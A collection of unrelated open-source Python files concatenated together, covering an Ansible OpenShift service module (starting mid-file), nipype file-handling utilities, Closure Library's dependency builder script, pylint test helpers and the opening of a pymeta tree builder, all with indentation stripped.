# pylint: disable=no-member
if hasattr(self.yaml_dict, 'fa'):
tmp_copy.fa.set_block_style()
result = Yedit.add_entry(tmp_copy, path, value, self.separator)
if result:
self.yaml_dict = tmp_copy
return (True, self.yaml_dict)
return (False, self.yaml_dict)
# pylint: disable=too-many-instance-attributes
class ServiceConfig(object):
''' Handle service options '''
# pylint: disable=too-many-arguments
def __init__(self,
sname,
namespace,
ports,
selector=None,
labels=None,
cluster_ip=None,
portal_ip=None,
session_affinity=None,
service_type=None):
''' constructor for handling service options '''
self.name = sname
self.namespace = namespace
self.ports = ports
self.selector = selector
self.labels = labels
self.cluster_ip = cluster_ip
self.portal_ip = portal_ip
self.session_affinity = session_affinity
self.service_type = service_type
self.data = {}
self.create_dict()
def create_dict(self):
''' return a service as a dict '''
self.data['apiVersion'] = 'v1'
self.data['kind'] = 'Service'
self.data['metadata'] = {}
self.data['metadata']['name'] = self.name
self.data['metadata']['namespace'] = self.namespace
if self.labels:
for lab, lab_value in self.labels.items():
self.data['metadata'][lab] = lab_value
self.data['spec'] = {}
if self.ports:
self.data['spec']['ports'] = self.ports
else:
self.data['spec']['ports'] = []
if self.selector:
self.data['spec']['selector'] = self.selector
self.data['spec']['sessionAffinity'] = self.session_affinity or 'None'
if self.cluster_ip:
self.data['spec']['clusterIP'] = self.cluster_ip
if self.portal_ip:
self.data['spec']['portalIP'] = self.portal_ip
if self.service_type:
self.data['spec']['type'] = self.service_type
# pylint: disable=too-many-instance-attributes,too-many-public-methods
class Service(Yedit):
''' Class to wrap the oc command line tools '''
port_path = "spec.ports"
portal_ip = "spec.portalIP"
cluster_ip = "spec.clusterIP"
kind = 'Service'
def __init__(self, content):
'''Service constructor'''
super(Service, self).__init__(content=content)
def get_ports(self):
''' get a list of ports '''
return self.get(Service.port_path) or []
def add_ports(self, inc_ports):
''' add a port object to the ports list '''
if not isinstance(inc_ports, list):
inc_ports = [inc_ports]
ports = self.get_ports()
if not ports:
self.put(Service.port_path, inc_ports)
else:
ports.extend(inc_ports)
return True
def find_ports(self, inc_port):
''' find a specific port '''
for port in self.get_ports():
if port['port'] == inc_port['port']:
return port
return None
def delete_ports(self, inc_ports):
''' remove a port from a service '''
if not isinstance(inc_ports, list):
inc_ports = [inc_ports]
ports = self.get(Service.port_path) or []
if not ports:
return True
removed = False
for inc_port in inc_ports:
port = self.find_ports(inc_port)
if port:
ports.remove(port)
removed = True
return removed
def add_cluster_ip(self, sip):
'''add cluster ip'''
self.put(Service.cluster_ip, sip)
def add_portal_ip(self, pip):
'''add cluster ip'''
self.put(Service.portal_ip, pip)
# pylint: disable=too-many-instance-attributes
class OCService(OpenShiftCLI):
''' Class to wrap the oc command line tools '''
kind = 'service'
# pylint allows 5
# pylint: disable=too-many-arguments
def __init__(self,
sname,
namespace,
labels,
selector,
cluster_ip,
portal_ip,
ports,
session_affinity,
service_type,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False):
''' Constructor for OCVolume '''
super(OCService, self).__init__(namespace, kubeconfig)
self.namespace = namespace
self.config = ServiceConfig(sname, namespace, ports, selector, labels,
cluster_ip, portal_ip, session_affinity, service_type)
self.user_svc = Service(content=self.config.data)
self.svc = None
@property
def service(self):
''' property function service'''
if not self.svc:
self.get()
return self.svc
@service.setter
def service(self, data):
''' setter function for yedit var '''
self.svc = data
def exists(self):
''' return whether a volume exists '''
if self.service:
return True
return False
def get(self):
'''return volume information '''
result = self._get(self.kind, self.config.name)
if result['returncode'] == 0:
self.service = Service(content=result['results'][0])
result['clusterip'] = self.service.get('spec.clusterIP')
elif 'services \"%s\" not found' % self.config.name in result['stderr']:
result['clusterip'] = ''
return result
def delete(self):
'''delete the object'''
return self._delete(self.kind, self.config.name)
def create(self):
'''create a service '''
return self._create_from_content(self.config.name, self.user_svc.yaml_dict)
def update(self):
'''create a service '''
# Need to copy over the portalIP and the serviceIP settings
self.user_svc.add_cluster_ip(self.service.get('spec.clusterIP'))
self.user_svc.add_portal_ip(self.service.get('spec.portalIP'))
return self._replace_content(self.kind, self.config.name, self.user_svc.yaml_dict)
def needs_update(self):
''' verify an update is needed '''
skip = ['clusterIP', 'portalIP']
return not Utils.check_def_equal(self.user_svc.yaml_dict, self.service.yaml_dict, skip_keys=skip, debug=True)
def main():
'''
ansible oc module for services
'''
module = AnsibleModule(
argument_spec=dict(
kubeconfig=dict(default='/etc/origin/master/admin.kubeconfig', type='str'),
state=dict(default='present', type='str',
choices=['present', 'absent', 'list']),
debug=dict(default=False, type='bool'),
namespace=dict(default='default', type='str'),
name=dict(default=None, type='str'),
labels=dict(default=None, type='dict'),
selector=dict(default=None, type='dict'),
clusterip=dict(default=None, type='str'),
portalip=dict(default=None, type='str'),
ports=dict(default=None, type='list'),
session_affinity=dict(default='None', type='str'),
service_type=dict(default='ClusterIP', type='str'),
),
supports_check_mode=True,
)
oc_svc = OCService(module.params['name'],
module.params['namespace'],
module.params['labels'],
module.params['selector'],
module.params['clusterip'],
module.params['portalip'],
module.params['ports'],
module.params['session_affinity'],
module.params['service_type'])
state = module.params['state']
api_rval = oc_svc.get()
#####
# Get
#####
if state == 'list':
module.exit_json(changed=False, results=api_rval, state="list")
########
# Delete
########
if state == 'absent':
if oc_svc.exists():
if module.check_mode:
module.exit_json(changed=False, msg='Would have performed a delete.')
api_rval = oc_svc.delete()
module.exit_json(changed=True, results=api_rval, state="absent")
module.exit_json(changed=False, state="absent")
if state == 'present':
########
# Create
########
if not oc_svc.exists():
if module.check_mode:
module.exit_json(changed=False, msg='Would have performed a create.')
# Create it here
api_rval = oc_svc.create()
if api_rval['returncode'] != 0:
module.fail_json(msg=api_rval)
# return the created object
api_rval = oc_svc.get()
if api_rval['returncode'] != 0:
module.fail_json(msg=api_rval)
module.exit_json(changed=True, results=api_rval, state="present")
########
# Update
########
if oc_svc.needs_update():
api_rval = oc_svc.update()
if api_rval['returncode'] != 0:
module.fail_json(msg=api_rval)
# return the created object
api_rval = oc_svc.get()
if api_rval['returncode'] != 0:
module.fail_json(msg=api_rval)
module.exit_json(changed=True, results=api_rval, state="present")
module.exit_json(changed=False, results=api_rval, state="present")
module.exit_json(failed=True,
changed=False,
results='Unknown state passed. %s' % state,
state="unknown")
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import, locally-disabled
# import module snippets. This are required
from ansible.module_utils.basic import *
main()
| |
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Miscellaneous file manipulation functions
"""
import cPickle
from glob import glob
import gzip
import os
import re
import shutil
# The md5 module is deprecated in Python 2.6, but hashlib is only
# available as an external package for versions of python before 2.6.
# Both md5 algorithms appear to return the same result.
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
# json included in Python 2.6
import json
except ImportError:
# simplejson is the json module that was included in 2.6 (I
# believe). Used here for Python 2.5
import simplejson as json
import numpy as np
from nipype.interfaces.traits_extension import isdefined
from nipype.utils.misc import is_container
from .. import logging, config
fmlogger = logging.getLogger("filemanip")
class FileNotFoundError(Exception):
pass
def split_filename(fname):
"""Split a filename into parts: path, base filename and extension.
Parameters
----------
fname : str
file or path name
Returns
-------
pth : str
base path from fname
fname : str
filename from fname, without extension
ext : str
file extension from fname
Examples
--------
>>> from nipype.utils.filemanip import split_filename
>>> pth, fname, ext = split_filename('/home/data/subject.nii.gz')
>>> pth
'/home/data'
>>> fname
'subject'
>>> ext
'.nii.gz'
"""
special_extensions = [".nii.gz", ".tar.gz"]
pth, fname = os.path.split(fname)
ext = None
for special_ext in special_extensions:
ext_len = len(special_ext)
if len(fname) > ext_len and fname[-ext_len:].lower() == special_ext.lower():
ext = fname[-ext_len:]
fname = fname[:-ext_len]
break
if not ext:
fname, ext = os.path.splitext(fname)
return pth, fname, ext
def fname_presuffix(fname, prefix='', suffix='', newpath=None, use_ext=True):
"""Manipulates path and name of input filename
Parameters
----------
fname : string
A filename (may or may not include path)
prefix : string
Characters to prepend to the filename
suffix : string
Characters to append to the filename
newpath : string
Path to replace the path of the input fname
use_ext : boolean
If True (default), appends the extension of the original file
to the output name.
Returns
-------
Absolute path of the modified filename
>>> from nipype.utils.filemanip import fname_presuffix
>>> fname = 'foo.nii.gz'
>>> fname_presuffix(fname,'pre','post','/tmp')
'/tmp/prefoopost.nii.gz'
"""
pth, fname, ext = split_filename(fname)
if not use_ext:
ext = ''
if newpath and isdefined(newpath):
pth = os.path.abspath(newpath)
return os.path.join(pth, prefix+fname+suffix+ext)
def fnames_presuffix(fnames, prefix='', suffix='', newpath=None,use_ext=True):
"""Calls fname_presuffix for a list of files.
"""
f2 = []
for fname in fnames:
f2.append(fname_presuffix(fname, prefix, suffix, newpath, use_ext))
return f2
def hash_rename(filename, hash):
"""renames a file given original filename and hash
and sets path to output_directory
"""
path, name, ext = split_filename(filename)
newfilename = ''.join((name,'_0x', hash, ext))
return os.path.join(path, newfilename)
def check_forhash(filename):
"""checks if file has a hash in its filename"""
if isinstance(filename,list):
filename = filename[0]
path, name = os.path.split(filename)
if re.search('(_0x[a-z0-9]{32})', name):
hash = re.findall('(_0x[a-z0-9]{32})', name)
return True, hash
else:
return False, None
def hash_infile(afile, chunk_len=8192):
""" Computes md5 hash of a file"""
md5hex = None
if os.path.isfile(afile):
md5obj = md5()
fp = file(afile, 'rb')
while True:
data = fp.read(chunk_len)
if not data:
break
md5obj.update(data)
fp.close()
md5hex = md5obj.hexdigest()
return md5hex
def hash_timestamp(afile):
""" Computes md5 hash of the timestamp of a file """
md5hex = None
if os.path.isfile(afile):
md5obj = md5()
stat = os.stat(afile)
md5obj.update(str(stat.st_size))
md5obj.update(str(stat.st_mtime))
md5hex = md5obj.hexdigest()
return md5hex
def copyfile(originalfile, newfile, copy=False, create_new=False, hashmethod=None):
"""Copy or symlink ``originalfile`` to ``newfile``.
Parameters
----------
originalfile : str
full path to original file
newfile : str
full path to new file
copy : Bool
specifies whether to copy or symlink files
(default=False) but only for POSIX systems
Returns
-------
None
"""
newhash = None
orighash = None
fmlogger.debug(newfile)
if create_new:
while os.path.exists(newfile):
base, fname, ext = split_filename(newfile)
s = re.search('_c[0-9]{4,4}$',fname)
i = 0
if s:
i = int(s.group()[2:])+1
fname = fname[:-6] + "_c%04d"%i
else:
fname += "_c%04d"%i
newfile = base + os.sep + fname + ext
if hashmethod is None:
hashmethod = config.get('execution', 'hash_method').lower()
elif os.path.exists(newfile):
if hashmethod == 'timestamp':
newhash = hash_timestamp(newfile)
elif hashmethod == 'content':
newhash = hash_infile(newfile)
fmlogger.debug("File: %s already exists,%s, copy:%d" \
% (newfile, newhash, copy))
#the following seems unnecessary
#if os.name is 'posix' and copy:
# if os.path.lexists(newfile) and os.path.islink(newfile):
# os.unlink(newfile)
# newhash = None
if os.name is 'posix' and not copy:
if os.path.lexists(newfile):
if hashmethod == 'timestamp':
orighash = hash_timestamp(originalfile)
elif hashmethod == 'content':
orighash = hash_infile(originalfile)
fmlogger.debug('Original hash: %s, %s'%(originalfile, orighash))
if newhash != orighash:
os.unlink(newfile)
if (newhash is None) or (newhash != orighash):
os.symlink(originalfile,newfile)
else:
if newhash:
if hashmethod == 'timestamp':
orighash = hash_timestamp(originalfile)
elif hashmethod == 'content':
orighash = hash_infile(originalfile)
if (newhash is None) or (newhash != orighash):
try:
fmlogger.debug("Copying File: %s->%s" \
% (newfile, originalfile))
shutil.copyfile(originalfile, newfile)
except shutil.Error, e:
fmlogger.warn(e.message)
else:
fmlogger.debug("File: %s already exists, not overwriting, copy:%d" \
% (newfile, copy))
if originalfile.endswith(".img"):
hdrofile = originalfile[:-4] + ".hdr"
hdrnfile = newfile[:-4] + ".hdr"
matofile = originalfile[:-4] + ".mat"
if os.path.exists(matofile):
matnfile = newfile[:-4] + ".mat"
copyfile(matofile, matnfile, copy)
copyfile(hdrofile, hdrnfile, copy)
elif originalfile.endswith(".BRIK"):
hdrofile = originalfile[:-4] + ".HEAD"
hdrnfile = newfile[:-4] + ".HEAD"
copyfile(hdrofile, hdrnfile, copy)
return newfile
def copyfiles(filelist, dest, copy=False, create_new=False):
"""Copy or symlink files in ``filelist`` to ``dest`` directory.
Parameters
----------
filelist : list
List of files to copy.
dest : path/files
full path to destination. If it is a list of length greater
than 1, then it assumes that these are the names of the new
files.
copy : Bool
specifies whether to copy or symlink files
(default=False) but only for posix systems
Returns
-------
None
"""
outfiles = filename_to_list(dest)
newfiles = []
for i,f in enumerate(filename_to_list(filelist)):
if isinstance(f, list):
newfiles.insert(i, copyfiles(f, dest, copy=copy, create_new=create_new))
else:
if len(outfiles) > 1:
destfile = outfiles[i]
else:
destfile = fname_presuffix(f, newpath=outfiles[0])
destfile = copyfile(f,destfile,copy,create_new=create_new)
newfiles.insert(i,destfile)
return newfiles
def filename_to_list(filename):
"""Returns a list given either a string or a list
"""
if isinstance(filename,(str, unicode)):
return [filename]
elif isinstance(filename,list):
return filename
elif is_container(filename):
return [x for x in filename]
else:
return None
def list_to_filename(filelist):
"""Returns a list if filelist is a list of length greater than 1,
otherwise returns the first element
"""
if len(filelist) > 1:
return filelist
else:
return filelist[0]
def cleandir(dir):
"""Cleans all nifti, img/hdr, txt and matfiles from dir"""
filetypes = ['*.nii','*.nii.gz','*.txt','*.img','*.hdr','*.mat','*.json']
for ftype in filetypes:
for f in glob(os.path.join(dir,ftype)):
os.remove(f)
def save_json(filename, data):
"""Save data to a json file
Parameters
----------
filename : str
Filename to save data in.
data : dict
Dictionary to save in json file.
"""
fp = file(filename, 'w')
json.dump(data, fp, sort_keys=True, indent=4)
fp.close()
def debuglog(inputlines,filename='/tmp/dbginputs.txt'):
fp=open(filename,'at')
fp.writelines(inputlines)
fp.close()
def load_json(filename):
"""Load data from a json file
Parameters
----------
filename : str
Filename to load data from.
Returns
-------
data : dict
"""
fp = file(filename, 'r')
data = json.load(fp)
fp.close()
return data
def loadflat(infile, *args):
"""Load an npz file into a dict
"""
data = np.load(infile)
out = {}
if args:
outargs = np.setdiff1d(args,data.files)
if outargs:
raise IOError('File does not contain variables: '+str(outargs))
for k in data.files:
if k in args or not args:
out[k] = [f for f in data[k].flat]
if len(out[k])==1:
out[k] = out[k].pop()
return out
def loadcrash(infile, *args):
if '.pkl' in infile:
return loadpkl(infile)
else:
return loadflat(infile, *args)
def loadpkl(infile):
"""Load a zipped or plain cPickled file
"""
if infile.endswith('pklz'):
pkl_file = gzip.open(infile, 'rb')
else:
pkl_file = open(infile)
return cPickle.load(pkl_file)
def savepkl(filename, record):
if filename.endswith('pklz'):
pkl_file = gzip.open(filename, 'wb')
else:
pkl_file = open(filename, 'wb')
cPickle.dump(record, pkl_file)
pkl_file.close()
rst_levels = ['=', '-', '~', '+']
def write_rst_header(header, level=0):
return '\n'.join((header, ''.join([rst_levels[level] for _ in header])))+'\n\n'
def write_rst_list(items, prefix=''):
out = []
for item in items:
out.append(prefix + ' ' + str(item))
return '\n'.join(out)+'\n\n'
def write_rst_dict(info, prefix=''):
out = []
for key, value in sorted(info.items()):
out.append(prefix + '* ' + key + ' : ' + str(value))
return '\n'.join(out)+'\n\n'
| |
#!/usr/bin/env python
#
# Copyright 2009 The Closure Library Authors. All Rights Reserved.
"""Utility for Closure Library dependency calculation.
ClosureBuilder scans source files to build dependency info. From the
dependencies, the script can produce a deps.js file, a manifest in dependency
order, a concatenated script, or compiled output from the Closure Compiler.
Paths to files can be expressed as individual arguments to the tool (intended
for use with find and xargs). As a convenience, --root can be used to specify
all JS files below a directory.
usage: %prog [options] [file1.js file2.js ...]
"""
import logging
import optparse
import os
import sys
import depstree
import jscompiler
import source
import treescan
def _GetOptionsParser():
"""Get the options parser."""
parser = optparse.OptionParser(__doc__)
parser.add_option('-i',
'--input',
dest='inputs',
action='append',
default=[],
help='One or more input files to calculate dependencies '
'for. The namespaces in this file will be combined with '
'those given with the -n flag to form the set of '
'namespaces to find dependencies for.')
parser.add_option('-n',
'--namespace',
dest='namespaces',
action='append',
default=[],
help='One or more namespaces to calculate dependencies '
'for. These namespaces will be combined with those given '
'with the -i flag to form the set of namespaces to find '
'dependencies for. A Closure namespace is a '
'dot-delimited path expression declared with a call to '
'goog.provide() (e.g. "goog.array" or "foo.bar").')
parser.add_option('--root',
dest='roots',
action='append',
help='The paths that should be traversed to build the '
'dependencies.')
parser.add_option('-o',
'--output_mode',
dest='output_mode',
type='choice',
action='store',
choices=['list', 'script', 'compiled'],
default='list',
help='The type of output to generate from this script. '
'Options are "list" for a list of filenames, "script" '
'for a single script containing the contents of all the '
'files, or "compiled" to produce compiled output with '
'the Closure Compiler. Default is "list".')
parser.add_option('-c',
'--compiler_jar',
dest='compiler_jar',
action='store',
help='The location of the Closure compiler .jar file.')
parser.add_option('-f',
'--compiler_flags',
dest='compiler_flags',
default=[],
action='append',
help='Additional flags to pass to the Closure compiler.')
parser.add_option('--output_file',
dest='output_file',
action='store',
help=('If specified, write output to this path instead of '
'writing to standard output.'))
return parser
def _GetInputByPath(path, sources):
"""Get the source identified by a path.
Args:
path: str, A path to a file that identifies a source.
sources: An iterable collection of source objects.
Returns:
The source from sources identified by path, if found. Converts to
absolute paths for comparison.
"""
for js_source in sources:
# Convert both to absolute paths for comparison.
if os.path.abspath(path) == os.path.abspath(js_source.GetPath()):
return js_source
def _GetClosureBaseFile(sources):
"""Given a set of sources, returns the one base.js file.
Note that if zero or two or more base.js files are found, an error message
will be written and the program will be exited.
Args:
sources: An iterable of _PathSource objects.
Returns:
The _PathSource representing the base Closure file.
"""
filtered_base_files = filter(_IsClosureBaseFile, sources)
if not filtered_base_files:
logging.error('No Closure base.js file found.')
sys.exit(1)
if len(filtered_base_files) > 1:
logging.error('More than one Closure base.js files found at these paths:')
for base_file in filtered_base_files:
logging.error(base_file.GetPath())
sys.exit(1)
return filtered_base_files[0]
def _IsClosureBaseFile(js_source):
"""Returns true if the given _PathSource is the Closure base.js source."""
if os.path.basename(js_source.GetPath()) == 'base.js':
# Sanity check that this is the Closure base file. Check that this
# is where goog is defined.
for line in js_source.GetSource().splitlines():
if line.startswith('var goog = goog || {};'):
return True
return False
class _PathSource(source.Source):
"""Source file subclass that remembers its file path."""
def __init__(self, path):
"""Initialize a source.
Args:
path: str, Path to a JavaScript file. The source string will be read
from this file.
"""
super(_PathSource, self).__init__(source.GetFileContents(path))
self._path = path
def GetPath(self):
"""Returns the path."""
return self._path
def main():
logging.basicConfig(format=(sys.argv[0] + ': %(message)s'),
level=logging.INFO)
options, args = _GetOptionsParser().parse_args()
# Make our output pipe.
if options.output_file:
out = open(options.output_file, 'w')
else:
out = sys.stdout
sources = set()
logging.info('Scanning paths...')
for path in options.roots:
for js_path in treescan.ScanTreeForJsFiles(path):
sources.add(_PathSource(js_path))
# Add scripts specified on the command line.
for path in args:
sources.add(source.Source(_PathSource(path)))
logging.info('%s sources scanned.', len(sources))
# Though deps output doesn't need to query the tree, we still build it
# to validate dependencies.
logging.info('Building dependency tree..')
tree = depstree.DepsTree(sources)
input_namespaces = set()
inputs = options.inputs or []
for input_path in inputs:
js_input = _GetInputByPath(input_path, sources)
if not js_input:
logging.error('No source matched input %s', input_path)
sys.exit(1)
input_namespaces.update(js_input.provides)
input_namespaces.update(options.namespaces)
if not input_namespaces:
logging.error('No namespaces found. At least one namespace must be '
'specified with the --namespace or --input flags.')
sys.exit(2)
# The Closure Library base file must go first.
base = _GetClosureBaseFile(sources)
deps = [base] + tree.GetDependencies(input_namespaces)
output_mode = options.output_mode
if output_mode == 'list':
out.writelines([js_source.GetPath() + '\n' for js_source in deps])
elif output_mode == 'script':
out.writelines([js_source.GetSource() for js_source in deps])
elif output_mode == 'compiled':
# Make sure a .jar is specified.
if not options.compiler_jar:
logging.error('--compiler_jar flag must be specified if --output is '
'"compiled"')
sys.exit(2)
compiled_source = jscompiler.Compile(
options.compiler_jar,
[js_source.GetPath() for js_source in deps],
options.compiler_flags)
if compiled_source is None:
logging.error('JavaScript compilation failed.')
sys.exit(1)
else:
logging.info('JavaScript compilation succeeded.')
out.write(compiled_source)
else:
logging.error('Invalid value for --output flag.')
sys.exit(2)
if __name__ == '__main__':
main()
| |
# Copyright (c) 2003-2013 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""functional/non regression tests for pylint"""
from __future__ import print_function
import collections
import contextlib
import functools
import os
import sys
import re
import unittest
import tempfile
import tokenize
from glob import glob
from os import linesep, getcwd, sep
from os.path import abspath, basename, dirname, isdir, join, splitext
from astroid import test_utils
from pylint import checkers
from pylint.utils import PyLintASTWalker
from pylint.reporters import BaseReporter
from pylint.interfaces import IReporter
from pylint.lint import PyLinter
import six
from six.moves import StringIO
# Utils
SYS_VERS_STR = '%d%d%d' % sys.version_info[:3]
TITLE_UNDERLINES = ['', '=', '-', '.']
PREFIX = abspath(dirname(__file__))
PY3K = sys.version_info[0] == 3
def fix_path():
sys.path.insert(0, PREFIX)
def get_tests_info(input_dir, msg_dir, prefix, suffix):
"""get python input examples and output messages
We use following conventions for input files and messages:
for different inputs:
test for python >= x.y -> input = <name>_pyxy.py
test for python < x.y -> input = <name>_py_xy.py
for one input and different messages:
message for python >= x.y -> message = <name>_pyxy.txt
lower versions -> message with highest num
"""
result = []
for fname in glob(join(input_dir, prefix + '*' + suffix)):
infile = basename(fname)
fbase = splitext(infile)[0]
# filter input files :
pyrestr = fbase.rsplit('_py', 1)[-1] # like _26 or 26
if pyrestr.isdigit(): # '24', '25'...
if SYS_VERS_STR < pyrestr:
continue
if pyrestr.startswith('_') and pyrestr[1:].isdigit():
# skip test for higher python versions
if SYS_VERS_STR >= pyrestr[1:]:
continue
messages = glob(join(msg_dir, fbase + '*.txt'))
# the last one will be without ext, i.e. for all or upper versions:
if messages:
for outfile in sorted(messages, reverse=True):
py_rest = outfile.rsplit('_py', 1)[-1][:-4]
if py_rest.isdigit() and SYS_VERS_STR >= py_rest:
break
else:
# This will provide an error message indicating the missing filename.
outfile = join(msg_dir, fbase + '.txt')
result.append((infile, outfile))
return result
class TestReporter(BaseReporter):
"""reporter storing plain text messages"""
__implements__ = IReporter
def __init__(self): # pylint: disable=super-init-not-called
self.message_ids = {}
self.reset()
self.path_strip_prefix = getcwd() + sep
def reset(self):
self.out = StringIO()
self.messages = []
def add_message(self, msg_id, location, msg):
"""manage message of different type and in the context of path """
_, _, obj, line, _ = location
self.message_ids[msg_id] = 1
if obj:
obj = ':%s' % obj
sigle = msg_id[0]
if PY3K and linesep != '\n':
# 2to3 writes os.linesep instead of using
# the previosly used line separators
msg = msg.replace('\r\n', '\n')
self.messages.append('%s:%3s%s: %s' % (sigle, line, obj, msg))
def finalize(self):
self.messages.sort()
for msg in self.messages:
print(msg, file=self.out)
result = self.out.getvalue()
self.reset()
return result
def display_results(self, layout):
"""ignore layouts"""
class Message(collections.namedtuple('Message',
['msg_id', 'line', 'node', 'args'])):
def __new__(cls, msg_id, line=None, node=None, args=None):
return tuple.__new__(cls, (msg_id, line, node, args))
class UnittestLinter(object):
"""A fake linter class to capture checker messages."""
# pylint: disable=unused-argument, no-self-use
def __init__(self):
self._messages = []
self.stats = {}
def release_messages(self):
try:
return self._messages
finally:
self._messages = []
def add_message(self, msg_id, line=None, node=None, args=None,
confidence=None):
self._messages.append(Message(msg_id, line, node, args))
def is_message_enabled(self, *unused_args):
return True
def add_stats(self, **kwargs):
for name, value in six.iteritems(kwargs):
self.stats[name] = value
return self.stats
@property
def options_providers(self):
return linter.options_providers
def set_config(**kwargs):
"""Decorator for setting config values on a checker."""
def _Wrapper(fun):
@functools.wraps(fun)
def _Forward(self):
for key, value in six.iteritems(kwargs):
setattr(self.checker.config, key, value)
if isinstance(self, CheckerTestCase):
# reopen checker in case, it may be interested in configuration change
self.checker.open()
fun(self)
return _Forward
return _Wrapper
class CheckerTestCase(unittest.TestCase):
"""A base testcase class for unittesting individual checker classes."""
CHECKER_CLASS = None
CONFIG = {}
def setUp(self):
self.linter = UnittestLinter()
self.checker = self.CHECKER_CLASS(self.linter) # pylint: disable=not-callable
for key, value in six.iteritems(self.CONFIG):
setattr(self.checker.config, key, value)
self.checker.open()
@contextlib.contextmanager
def assertNoMessages(self):
"""Assert that no messages are added by the given method."""
with self.assertAddsMessages():
yield
@contextlib.contextmanager
def assertAddsMessages(self, *messages):
"""Assert that exactly the given method adds the given messages.
The list of messages must exactly match *all* the messages added by the
method. Additionally, we check to see whether the args in each message can
actually be substituted into the message string.
"""
yield
got = self.linter.release_messages()
msg = ('Expected messages did not match actual.\n'
'Expected:\n%s\nGot:\n%s' % ('\n'.join(repr(m) for m in messages),
'\n'.join(repr(m) for m in got)))
self.assertEqual(list(messages), got, msg)
def walk(self, node):
"""recursive walk on the given node"""
walker = PyLintASTWalker(linter)
walker.add_checker(self.checker)
walker.walk(node)
# Init
test_reporter = TestReporter()
linter = PyLinter()
linter.set_reporter(test_reporter)
linter.config.persistent = 0
checkers.initialize(linter)
linter.global_set_option('required-attributes', ('__revision__',))
if linesep != '\n':
LINE_RGX = re.compile(linesep)
def ulines(string):
return LINE_RGX.sub('\n', string)
else:
def ulines(string):
return string
INFO_TEST_RGX = re.compile(r'^func_i\d\d\d\d$')
def exception_str(self, ex): # pylint: disable=unused-argument
"""function used to replace default __str__ method of exception instances"""
return 'in %s\n:: %s' % (ex.file, ', '.join(ex.args))
# Test classes
class LintTestUsingModule(unittest.TestCase):
INPUT_DIR = None
DEFAULT_PACKAGE = 'input'
package = DEFAULT_PACKAGE
linter = linter
module = None
depends = None
output = None
_TEST_TYPE = 'module'
maxDiff = None
def shortDescription(self):
values = {'mode' : self._TEST_TYPE,
'input': self.module,
'pkg': self.package,
'cls': self.__class__.__name__}
if self.package == self.DEFAULT_PACKAGE:
msg = '%(mode)s test of input file "%(input)s" (%(cls)s)'
else:
msg = '%(mode)s test of input file "%(input)s" in "%(pkg)s" (%(cls)s)'
return msg % values
def test_functionality(self):
tocheck = [self.package+'.'+self.module]
if self.depends:
tocheck += [self.package+'.%s' % name.replace('.py', '')
for name, _ in self.depends]
self._test(tocheck)
def _check_result(self, got):
self.assertMultiLineEqual(self._get_expected().strip()+'\n',
got.strip()+'\n')
def _test(self, tocheck):
if INFO_TEST_RGX.match(self.module):
self.linter.enable('I')
else:
self.linter.disable('I')
try:
self.linter.check(tocheck)
except Exception as ex:
# need finalization to restore a correct state
self.linter.reporter.finalize()
ex.file = tocheck
print(ex)
ex.__str__ = exception_str
raise
self._check_result(self.linter.reporter.finalize())
def _has_output(self):
return not self.module.startswith('func_noerror_')
def _get_expected(self):
if self._has_output() and self.output:
with open(self.output, 'U') as fobj:
return fobj.read().strip() + '\n'
else:
return ''
class LintTestUsingFile(LintTestUsingModule):
_TEST_TYPE = 'file'
def test_functionality(self):
importable = join(self.INPUT_DIR, self.module)
# python also prefers packages over simple modules.
if not isdir(importable):
importable += '.py'
tocheck = [importable]
if self.depends:
tocheck += [join(self.INPUT_DIR, name) for name, _file in self.depends]
self._test(tocheck)
class LintTestUpdate(LintTestUsingModule):
_TEST_TYPE = 'update'
def _check_result(self, got):
if self._has_output():
try:
expected = self._get_expected()
except IOError:
expected = ''
if got != expected:
with open(self.output, 'w') as fobj:
fobj.write(got)
# Callback
def cb_test_gen(base_class):
def call(input_dir, msg_dir, module_file, messages_file, dependencies):
# pylint: disable=no-init
class LintTC(base_class):
module = module_file.replace('.py', '')
output = messages_file
depends = dependencies or None
INPUT_DIR = input_dir
MSG_DIR = msg_dir
return LintTC
return call
# Main function
def make_tests(input_dir, msg_dir, filter_rgx, callbacks):
"""generate tests classes from test info
return the list of generated test classes
"""
if filter_rgx:
is_to_run = re.compile(filter_rgx).search
else:
is_to_run = lambda x: 1
tests = []
for module_file, messages_file in (
get_tests_info(input_dir, msg_dir, 'func_', '')
):
if not is_to_run(module_file) or module_file.endswith('.pyc'):
continue
base = module_file.replace('func_', '').replace('.py', '')
dependencies = get_tests_info(input_dir, msg_dir, base, '.py')
for callback in callbacks:
test = callback(input_dir, msg_dir, module_file, messages_file,
dependencies)
if test:
tests.append(test)
return tests
def tokenize_str(code):
return list(tokenize.generate_tokens(StringIO(code).readline))
@contextlib.contextmanager
def create_tempfile(content=None):
"""Create a new temporary file.
If *content* parameter is given, then it will be written
in the temporary file, before passing it back.
This is a context manager and should be used with a *with* statement.
"""
# Can't use tempfile.NamedTemporaryFile here
# because on Windows the file must be closed before writing to it,
# see http://bugs.python.org/issue14243
fd, tmp = tempfile.mkstemp()
if content:
if sys.version_info >= (3, 0):
# erff
os.write(fd, bytes(content, 'ascii'))
else:
os.write(fd, content)
try:
yield tmp
finally:
os.close(fd)
os.remove(tmp)
@contextlib.contextmanager
def create_file_backed_module(code):
"""Create an astroid module for the given code, backed by a real file."""
with create_tempfile() as temp:
module = test_utils.build_module(code)
module.file = temp
yield module
| |
# -*- test-case-name: pymeta.test.test_builder -*-
from types import ModuleType as module
import linecache, sys
class TreeBuilder(object):
"""
Produce an abstract syntax tree of OMeta operations.
"""
def __init__(self, name, grammar=None, *args):
self.name = name
def makeGrammar(self, rules):
return ["Grammar", self.name, rules]
def rule(self, name, expr):
return ["Rule", name, expr]
def apply(self, ruleName, codeName, *exprs):
return ["Apply", ruleName, codeName, exprs]
